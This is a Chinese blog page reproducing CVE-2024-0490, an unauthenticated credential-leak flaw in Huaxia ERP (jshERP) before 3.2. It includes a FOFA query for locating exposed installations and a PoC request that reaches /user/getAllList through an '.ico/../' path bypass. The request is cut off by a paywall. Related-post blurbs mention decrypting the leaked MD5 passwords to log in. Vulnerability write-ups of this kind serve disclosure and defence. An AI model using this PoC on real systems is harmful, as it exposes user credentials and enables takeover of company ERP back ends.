华夏ERP getAllList信息泄露漏洞复现(CVE-2024-0490)

已于 2024-01-16 17:59:47 修改
阅读量1.3k 收藏 1
点赞数 13
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-01-16 00:36:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135614063
版权

0x01 产品简介

华夏ERP基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务+生产功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。

0x02 漏洞概述

华夏ERP 3.1版本中存在一个问题,被评定为有问题的。该问题影响了文件/user/getAllList的某些未知处理过程。未经身份验证的攻击者可以利用此问题获取后台用户名密码列表。可导致后台被控,漏洞已被公开披露,可能被利用。

0x03 影响范围

华夏ERP < 3.2

0x04 复现环境

FOFA:"jshERP-boot"

024eeb36ac634368a036d4235ecfb530.png

0x05 漏洞复现 

PoC

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connectio
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 13
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
华夏ERP存在泄露用户名和密码敏感漏洞(CNVD-2020-63964)
失心少年
06-19 671
华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。
[漏洞复现]华夏erp账号密码泄露
qq_17754023的博客
06-22 1079
描述华夏 ERP 是一个基于SpringBoot框架和 SaaS模式的系统。华夏 ERP 存在帐号密码泄露漏洞,攻击者可利用该漏洞获取系统所有账号密码从而登录系统进行恶意攻击。目前官方暂未发布安全版本修复此漏洞,建议联系厂商获取加固建议。fofa语法:"jshERP-boot"
漏洞复现华夏ERP存在信息泄露漏洞
weixin_52204925的博客
03-13 557
华夏ERP基于SaaS模式,专注进销存+财务+生产功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询等。 华夏ERP系统存在信息泄露漏洞,恶意攻击者可能会利用该漏洞获取用户账号密码职位等敏感信息
华夏ERP存在泄露用户名和密码敏感漏洞复现
m0_49025459的博客
07-18 513
密码是MD5加密的,我们只需要正常的去解密,然后输入账号密码即可。
华夏ERP信息泄露
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
08-06 496
华夏ERP是一种企业资源规划(ERP)软件,旨在为企业提供全面的信息管理和集成解决方案,以提高效率、降低成本并优化业务流程。华夏ERP通常用于中小型企业。华夏ERP前台泄露了某api接口,恶意攻击者可通过调用该接口,对用户的账号和密码进行非授权访问,在获取到账号和密码后,恶意攻击者可接管后台。定期备份和灾难恢复计划:定期备份敏感信息,并建立有效的灾难恢复计划,以便在数据泄露事件发生时能够快速恢复数据。定期更新和修补软件漏洞:及时更新和修补系统和应用程序的漏洞,以减少攻击者利用漏洞获取敏感信息的可能性。
华夏ERP存在泄露用户名和密码敏感漏洞(CNVD-2020-63964)
nnn2188185的博客
06-16 1322
华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。 华夏ERP系统存在敏感信息漏洞,攻击者可利用该漏洞获取敏感信息
华夏ERP账号密码泄露漏+RCE
weixin_62352348的博客
01-18 591
华夏ERP账号密码泄露漏+RCE
「Java代码审计」华夏ERP3.0代码审计
橙留香Park的博客
09-22 3374
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ..
华夏账号密码信息泄露漏洞-漏洞复现
weixin_43167326的博客
01-20 409
jshERP立志为中小企业提供开源好用的。
华夏ERP_v2.3.1最新版SQL与RCE的审计过程1
08-03
前言认证绕过华夏ERP_v2.3.1最新版SQL与RCE的审计过程1.6. public class LogCostFilter implements Filt
华夏ERP信息泄露漏洞复现 [附POC]
薛定谔嘚喵博客
11-27 274
该系统存在敏感信息泄露漏洞,通过此漏洞攻击者可以获取系统用户,登录用户名,密码,职位等个人敏感信息
漏洞复现 POC 综合
qq_56895879的博客
08-14 835
漏洞复现
华夏ERP getAllList;.ico敏感信息泄露漏洞
Keepb1ue的博客
12-22 676
华夏ERP是基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,可以获取到系统的账号密码。将password的值进行md5解密为明文,即可登录。对相关接口进行限制访问、鉴权。
fastjson 反序列化之mysql JDBC 利用
qq_42077227的博客
04-19 2027
在打春秋云境Exchange 靶场时,入口点是华夏ERP 2.3版本系统,存在fastjson 反序列化漏洞,在尝试常见的fastjson利用链反弹shell都没有反应,最终使用mysql JDBC利用链反弹shell成功。在此记录一下。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1416
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 439
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 950
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
安鸾学院靶场——安全基础
qq_55202378的博客
06-13 1078
后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。添加完后,根据icon,可以看出这是一个python打包成的exe程序。看wp是由web.zip文件的,但是这里没有,所以搞不定了。下载提供的flag.zip和wordlist.txt,使用。:在vsftpd 2.3.4版本中,在登录输入用户名时输入。的返回包,可以拿到包含flag的txt文件。九阴真经上卷找不到,似乎被删了,只有下卷。类似于笑脸的符号,会导致服务处理开启。flag在whalwl数据库中。
org.apache.ibatis.binding.BindingException: Invalid bound statement (not found): Mapper.getAllList
12-16
这个异常信息表明在MyBatis中找不到名为Mapper.getAllList的语句。这可能是由于以下原因导致的: 1. Mapper.xml文件中没有定义id为getAllList的语句。 2. Mapper.xml文件中定义了id为getAllList的语句,但是在Mapper接口中没有对应的方法。 3. Mapper接口中定义了名为getAllList的方法,但是方法名和Mapper.xml文件中定义的id不一致。 解决方法: 1. 检查Mapper.xml文件中是否定义了id为getAllList的语句。 2. 检查Mapper接口中是否定义了名为getAllList的方法。 3. 确保Mapper接口中定义的方法名和Mapper.xml文件中定义的id一致。 以下是一个可能的解决方案: 在Mapper.xml文件中添加id为getAllList的语句: ```xml <select id="getAllList" resultType="com.example.demo.entity.User"> select * from user </select> ``` 在Mapper接口中添加名为getAllList的方法: ```java public interface UserMapper { List<User> getAllList(); } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值